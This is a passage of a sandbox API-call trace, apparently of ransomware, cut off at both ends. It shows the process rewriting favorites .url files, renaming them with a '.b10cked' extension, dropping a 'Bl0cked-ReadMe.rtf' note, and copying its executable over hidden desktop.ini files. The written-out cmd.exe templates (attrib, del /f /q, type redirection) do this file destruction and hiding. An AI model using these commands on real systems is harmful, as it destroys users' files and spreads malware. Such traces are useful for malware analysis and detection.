lpOverlapped=0x0) returned 1 [0213.458] SetFilePointer (in: hFile=0x120, lDistanceToMove=-66, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.458] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x42, lpOverlapped=0x0) returned 1 [0213.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0213.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Store.url", lpUsedDefaultChar=0x0) returned 19 [0213.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x86 [0213.461] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.462] CloseHandle (hObject=0x120) returned 1 [0213.462] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL") returned 0x2f [0213.463] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.464] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x134, dwThreadId=0xa80)) returned 1 [0213.469] CloseHandle (hObject=0x1b4) returned 1 [0213.469] CloseHandle (hObject=0x120) returned 1 [0213.470] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.470] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.470] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.470] ReleaseMutex (hMutex=0xf8) returned 1 [0213.470] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27032215702) returned 1 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.533] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.535] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.535] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.536] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.536] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.536] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.536] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Autos.url", lpUsedDefaultChar=0x0) returned 13 [0213.540] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.540] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.540] CloseHandle (hObject=0x120) returned 1 [0213.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL") returned 0x2f [0213.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.542] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9b0, dwThreadId=0xa94)) returned 1 [0213.551] CloseHandle (hObject=0x1b4) returned 1 [0213.551] CloseHandle (hObject=0x120) returned 1 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 3 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0213.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0213.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0213.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0213.551] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0213.551] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0213.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.552] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0213.552] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0213.552] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa54, dwThreadId=0xac0)) returned 1 [0213.557] CloseHandle (hObject=0x1b4) returned 1 [0213.557] CloseHandle (hObject=0x120) returned 1 [0213.557] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf")) returned 0xffffffff [0213.557] GetLastError () returned 0x2 [0213.557] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0213.560] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\msn websites\\bl0cked-readme.rtf")) returned 0x20 [0213.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.560] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0213.560] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0213.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.560] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0213.561] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0213.561] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0213.561] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0213.561] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1") returned 0x22 [0213.561] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MSNWEB~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0213.561] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0213.561] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h 